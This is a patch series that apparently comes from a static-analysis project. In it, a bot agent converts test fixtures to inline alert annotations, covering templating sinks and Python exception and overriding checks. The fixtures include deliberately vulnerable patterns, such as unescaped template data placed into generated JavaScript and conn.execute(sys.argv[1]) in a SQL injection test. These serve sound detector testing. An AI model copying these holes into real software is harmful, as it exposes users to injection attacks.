    diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs index 47105bb360ec..5dc0c0763cf3 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/angularjs_sinks.ejs @@ -1,7 +1,7 @@ - <%= escapedHtml %> - <%- rawHtml %> + <%= escapedHtml %> + <%- rawHtml %> <% include angularjs_include %> diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs b/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs index 42dfc124a709..b25de673433b 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/ejs_sinks.ejs @@ -10,15 +10,15 @@ var dataInStringLiteral = "<%= dataInStringLiteral %>"; var dataInStringLiteralRaw = "<%- dataInStringLiteralRaw %>"; - var dataInGeneratedCode = <%= dataInGeneratedCode %>; + var dataInGeneratedCode = <%= dataInGeneratedCode %>; // $ Alert var dataInGeneratedCodeRaw = <%- dataInGeneratedCodeRaw %>; - init("<%= backslashSink1 %>", "<%= backslashSink2 %>"); + init("<%= backslashSink1 %>", "<%= backslashSink2 %>"); // $ Alert var mustache = "{{ rawHtml }}"; - + <%- include('ejs_include1', { foo: rawHtml }) _%> diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs b/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs index 198af1cd8d41..a723f95e7745 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/hbs_sinks.hbs 
@@ -22,15 +22,15 @@ var dataInStringLiteral = "{{ dataInStringLiteral }}"; var dataInStringLiteralRaw = "{{{ dataInStringLiteralRaw }}}"; - var dataInGeneratedCode = {{ dataInGeneratedCode }}; + var dataInGeneratedCode = {{ dataInGeneratedCode }}; // $ Alert var dataInGeneratedCodeRaw = {{{ dataInGeneratedCodeRaw }}}; - init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); + init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); // $ Alert var ejs = "<%= rawHtml %>"; - + diff --git a/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk b/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk index fcfba32a26c8..dc34a5c0bbb1 100644 --- a/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk +++ b/javascript/ql/test/library-tests/frameworks/Templating/views/njk_sinks.njk @@ -10,16 +10,16 @@ var dataInStringLiteral = "{{ dataInStringLiteral }}"; var dataInStringLiteralRaw = "{{ dataInStringLiteralRaw | safe }}"; - var dataInGeneratedCode = {{ dataInGeneratedCode }}; - var dataInGeneratedCodeRaw = {{ dataInGeneratedCodeRaw | safe }}; + var dataInGeneratedCode = {{ dataInGeneratedCode }}; // $ Alert + var dataInGeneratedCodeRaw = {{ dataInGeneratedCodeRaw | safe }}; // $ Alert var dataInGeneratedCodeJsonRaw = {{ dataInGeneratedCodeJsonRaw | json | safe }}; - init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); + init("{{ backslashSink1 }}", "{{ backslashSink2 }}"); // $ Alert var ejs = "<%= rawHtml %>"; - - + + From e25418f436e9dc94524831b82f91599d93845d10 Mon Sep 17 00:00:00 2001 
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 22:24:36 +0000 Subject: [PATCH 14/15] Convert selected Python inline expectation tests --- .../general/CatchingBaseException.qlref | 1 + .../Exceptions/general/EmptyExcept.qlref | 1 + .../general/IllegalExceptionHandlerType.qlref | 1 + .../Exceptions/general/IllegalRaise.qlref | 1 + .../NotImplementedIsNotAnException.qlref | 1 + .../Exceptions/general/exceptions_test.py | 28 +++++++++---------- .../Exceptions/general/pypy_test.py | 3 +- .../IncorrectlyOverriddenMethod.qlref | 1 + ...IncorrectlySpecifiedOverriddenMethod.qlref | 1 + .../WrongNameForArgumentInCall.qlref | 1 + .../WrongNumberArgumentsInCall.qlref | 1 + .../query-tests/Functions/overriding/test.py | 14 +++++----- .../SqlInjection.qlref | 4 ++- .../test.py | 2 +- 14 files changed, 35 insertions(+), 25 deletions(-) diff --git a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref index bd98ca75af11..33b4697e7ef7 100644 --- a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref @@ -1 +1,2 @@ query: Exceptions/CatchingBaseException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref index 16e16f16ba5a..7a046d008cd2 100644 --- a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref +++ b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref @@ -1 +1,2 @@ query: Exceptions/EmptyExcept.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref index 4e3f71fe812a..7a7911ca4403 100644 --- a/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref +++ b/python/ql/test/query-tests/Exceptions/general/IllegalExceptionHandlerType.qlref @@ -1 +1,2 @@ query: Exceptions/IllegalExceptionHandlerType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref index 95e65710025b..2bee772260a9 100644 --- a/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref +++ b/python/ql/test/query-tests/Exceptions/general/IllegalRaise.qlref @@ -1 +1,2 @@ query: Exceptions/IllegalRaise.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref index 5b199983f759..a5e0761210e7 100644 --- a/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/NotImplementedIsNotAnException.qlref @@ -1 +1,2 @@ query: Exceptions/NotImplementedIsNotAnException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py index e5e9ea67a6e0..91acb9b9bf40 100644 --- a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py +++ b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py 
@@ -4,13 +4,13 @@ def ee1(val): try: val.attr - except: + except: # $ Alert[py/empty-except] Alert[py/catch-base-exception] pass def ee1(val): try: val.attr() - except TypeError: + except TypeError: # $ Alert[py/empty-except] pass def ee2(val): @@ -37,21 +37,21 @@ class NotException2(object): pass def illegal_raise_type(): - raise NotException1 + raise NotException1 # $ Alert[py/illegal-raise] def illegal_raise_value1(): - raise "Exception" + raise "Exception" # $ Alert[py/illegal-raise] def illegal_raise_value2(): - raise NotException2() + raise NotException2() # $ Alert[py/illegal-raise] def illegal_handler(): try: illegal_raise() - except NotException1: + except NotException1: # $ Alert[py/useless-except] #Must do something print("NotException1") - except NotException2: + except NotException2: # $ Alert[py/useless-except] #Must do something print("NotException2") @@ -69,7 +69,7 @@ class MyExc(ValueError): try: pass -except ValueError: +except ValueError: # $ Alert[py/empty-except] pass except MyExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitiation preventing MyExc from being tracked here. pass @@ -82,11 +82,11 @@ class MySubExc(MyBaseExc): try: pass -except MyBaseExc: +except MyBaseExc: # $ Alert[py/empty-except] pass except MySubExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitation preventing MyExc from being tracked here. pass -except Exception: +except Exception: # $ Alert[py/empty-except] pass @@ -94,7 +94,7 @@ class MySubExc(MyBaseExc): def catch_base_exception(): try: illegal_raise() - except BaseException: + except BaseException: # $ Alert[py/catch-base-exception] #Consumes KeyboardInterrupt pass @@ -135,7 +135,7 @@ def a_number(): def illegal_handler2(): try: illegal_raise() - except a_number(): + except a_number(): # $ Alert[py/useless-except] print ("Caught exception") def stop_iter_ok(seq): 
@@ -193,7 +193,7 @@ def ee8(x): #These are so common, we give warnings not errors. def foo(): - raise NotImplemented + raise NotImplemented # $ Alert[py/raise-not-implemented] def bar(): - raise NotImplemented() + raise NotImplemented() # $ Alert[py/raise-not-implemented] diff --git a/python/ql/test/query-tests/Exceptions/general/pypy_test.py b/python/ql/test/query-tests/Exceptions/general/pypy_test.py index 857e78d6d942..12d373e428e6 100644 --- a/python/ql/test/query-tests/Exceptions/general/pypy_test.py +++ b/python/ql/test/query-tests/Exceptions/general/pypy_test.py @@ -11,10 +11,9 @@ def __getattribute__(self, name): try: a = A() raise a - except 42: + except 42: # $ Alert[py/useless-except] #Some comment pass except A: #Another comment pass - diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref index cc2a5f9f73df..9d5a8324c796 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlyOverriddenMethod.qlref @@ -1 +1,2 @@ query: Functions/IncorrectlyOverriddenMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref index 958fcc629fff..258840b2fc43 100644 --- a/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref +++ b/python/ql/test/query-tests/Functions/overriding/IncorrectlySpecifiedOverriddenMethod.qlref @@ -1 +1,2 @@ query: Functions/IncorrectlySpecifiedOverriddenMethod.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref index e68f904bc81c..c6b6ca3d30fa 100644 --- a/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref +++ b/python/ql/test/query-tests/Functions/overriding/WrongNameForArgumentInCall.qlref @@ -1 +1,2 @@ query: Expressions/WrongNameForArgumentInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref index ee0b95d7b07e..68dc510d5c6e 100644 --- a/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref +++ b/python/ql/test/query-tests/Functions/overriding/WrongNumberArgumentsInCall.qlref @@ -1 +1,2 @@ query: Expressions/WrongNumberArgumentsInCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Functions/overriding/test.py b/python/ql/test/query-tests/Functions/overriding/test.py index 879efdbe2913..7c0ed5eb81bc 100644 --- a/python/ql/test/query-tests/Functions/overriding/test.py +++ b/python/ql/test/query-tests/Functions/overriding/test.py @@ -2,10 +2,10 @@ class Base(object): - def meth1(self): + def meth1(self): # $ Alert[py/inheritance/incorrect-overridden-signature] pass - def meth2(self, spam): + def meth2(self, spam): # $ Alert[py/inheritance/incorrect-overridden-signature] pass def meth3(self): @@ -13,10 +13,10 @@ def meth3(self): def foo(self): self.meth1() - self.meth1(0) - self.meth2() + self.meth1(0) # $ Alert[py/call/wrong-arguments] + self.meth2() # $ Alert[py/call/wrong-arguments] self.meth2(0) - self.meth1(spam="eggs") + self.meth1(spam="eggs") # $ Alert[py/call/wrong-named-argument] self.meth2(spam="eggs") class Derived(Base): 
@@ -44,7 +44,7 @@ def bar(self): class Abstract(object): - def meth(self): + def meth(self): # $ Alert[py/inheritance/incorrect-overridden-signature] raise NotImplementedError() @@ -109,7 +109,7 @@ def call_some(self): self.meth1() self.meth1(x=2) self.meth3() - self.meth3(x=2) + self.meth3(x=2) # $ Alert[py/call/wrong-named-argument] self.meth6(2, 3, 4) self.meth7() self.meth8(1,y=3) diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref index b6916bd2cd46..e19181577447 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/SqlInjection.qlref @@ -1,2 +1,4 @@ query: Security/CWE-089/SqlInjection.ql -postprocess: utils/test/PrettyPrintModels.ql +postprocess: + - utils/test/PrettyPrintModels.ql + - utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py index 97bfa393cedf..70959d0bff03 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection-local-threat-model/test.py @@ -3,4 +3,4 @@ import psycopg conn = psycopg.connect(...) -conn.execute(sys.argv[1]) +conn.execute(sys.argv[1]) # $ Alert From a713d75f0cb1cb42b5f0d813c2224a4e2a0a156c Mon Sep 17 00:00:00 2001 
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Thu, 11 Jun 2026 22:29:24 +0000 Subject: [PATCH 15/15] Refine Python inline expectation conversions --- .../Exceptions/general/CatchingBaseException.qlref | 1 - .../query-tests/Exceptions/general/EmptyExcept.qlref | 1 - .../Exceptions/general/exceptions_test.py | 12 ++++++------ .../ql/test/query-tests/Functions/overriding/test.py | 8 ++++---- 4 files changed, 10 insertions(+), 12 deletions(-) diff --git a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref index 33b4697e7ef7..bd98ca75af11 100644 --- a/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref +++ b/python/ql/test/query-tests/Exceptions/general/CatchingBaseException.qlref @@ -1,2 +1 @@ query: Exceptions/CatchingBaseException.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref index 7a046d008cd2..16e16f16ba5a 100644 --- a/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref +++ b/python/ql/test/query-tests/Exceptions/general/EmptyExcept.qlref @@ -1,2 +1 @@ query: Exceptions/EmptyExcept.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py index 91acb9b9bf40..2b2c2accf6e4 100644 --- a/python/ql/test/query-tests/Exceptions/general/exceptions_test.py +++ b/python/ql/test/query-tests/Exceptions/general/exceptions_test.py @@ -4,13 +4,13 @@ def ee1(val): try: val.attr - except: # $ Alert[py/empty-except] Alert[py/catch-base-exception] + except: pass def ee1(val): try: val.attr() - except TypeError: # $ Alert[py/empty-except] + except TypeError: pass def ee2(val): 
@@ -69,7 +69,7 @@ class MyExc(ValueError): try: pass -except ValueError: # $ Alert[py/empty-except] +except ValueError: pass except MyExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitiation preventing MyExc from being tracked here. pass @@ -82,11 +82,11 @@ class MySubExc(MyBaseExc): try: pass -except MyBaseExc: # $ Alert[py/empty-except] +except MyBaseExc: pass except MySubExc: # $ MISSING:Alert[py/unreachable-except] # Missing due to dataflow limitation preventing MyExc from being tracked here. pass -except Exception: # $ Alert[py/empty-except] +except Exception: pass @@ -94,7 +94,7 @@ class MySubExc(MyBaseExc): def catch_base_exception(): try: illegal_raise() - except BaseException: # $ Alert[py/catch-base-exception] + except BaseException: #Consumes KeyboardInterrupt pass diff --git a/python/ql/test/query-tests/Functions/overriding/test.py b/python/ql/test/query-tests/Functions/overriding/test.py index 7c0ed5eb81bc..640563700460 100644 --- a/python/ql/test/query-tests/Functions/overriding/test.py +++ b/python/ql/test/query-tests/Functions/overriding/test.py @@ -21,10 +21,10 @@ def foo(self): class Derived(Base): - def meth1(self, spam): # $ Alert[py/inheritance/signature-mismatch] # Has 1 more arg, base called in Base.foo + def meth1(self, spam): # $ Alert[py/inheritance/signature-mismatch] Alert[py/inheritance/incorrect-overriding-signature] # Has 1 more arg, base called in Base.foo pass - def meth2(self): # $ Alert[py/inheritance/signature-mismatch] # Has 1 fewer arg, base called in Base.foo + def meth2(self): # $ Alert[py/inheritance/signature-mismatch] Alert[py/inheritance/incorrect-overriding-signature] # Has 1 fewer arg, base called in Base.foo pass def meth3(self, eggs): # $ Alert[py/inheritance/signature-mismatch] # Has 1 more arg. Method is not called. 
@@ -44,7 +44,7 @@ def bar(self): class Abstract(object): - def meth(self): # $ Alert[py/inheritance/incorrect-overridden-signature] + def meth(self): raise NotImplementedError() @@ -61,7 +61,7 @@ def meth(self, arg): class BlameBase(object): - def meth(self): + def meth(self): # $ Alert[py/inheritance/incorrect-overridden-signature] pass class Correct1(BlameBase):